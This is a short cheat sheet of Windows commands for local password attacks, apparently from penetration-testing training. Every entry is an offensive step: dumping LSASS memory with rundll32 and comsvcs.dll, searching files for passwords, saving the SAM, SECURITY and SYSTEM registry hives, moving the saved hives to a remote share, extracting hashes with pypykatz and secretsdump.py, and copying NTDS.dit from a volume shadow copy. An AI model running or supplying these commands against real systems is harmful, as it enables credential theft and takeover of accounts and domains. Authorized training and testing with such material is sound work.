Windows Local Password Attacks

Command	Description
tasklist /svc	A command-line-based utility in Windows used to list running processes.
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml	Uses Windows command-line based utility findstr to search for the string "password" in many different file type.
Get-Process lsass	A Powershell cmdlet is used to display process information. Using this with the LSASS process can be helpful when attempting to dump LSASS process memory from the command line.
rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full	Uses rundll32 in Windows to create a LSASS memory dump file. This file can then be transferred to an attack box to extract credentials.
pypykatz lsa minidump /path/to/lsassdumpfile	Uses Pypykatz to parse and attempt to extract credentials & password hashes from an LSASS process memory dump file.
reg.exe save hklm\sam C:\sam.save	Uses reg.exe in Windows to save a copy of a registry hive at a specified location on the file system. It can be used to make copies of any registry hive (i.e., hklm\sam, hklm\security, hklm\system).
move sam.save \\<ip>\NameofFileShare	Uses move in Windows to transfer a file to a specified file share over the network.
python3 secretsdump.py -sam sam.save -security security.save -system system.save LOCAL	Uses Secretsdump.py to dump password hashes from the SAM database.
vssadmin CREATE SHADOW /For=C:	Uses Windows command line based tool vssadmin to create a volume shadow copy for C:. This can be used to make a copy of NTDS.dit safely.
cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit	Uses Windows command line based tool copy to create a copy of NTDS.dit for a volume shadow copy of C:.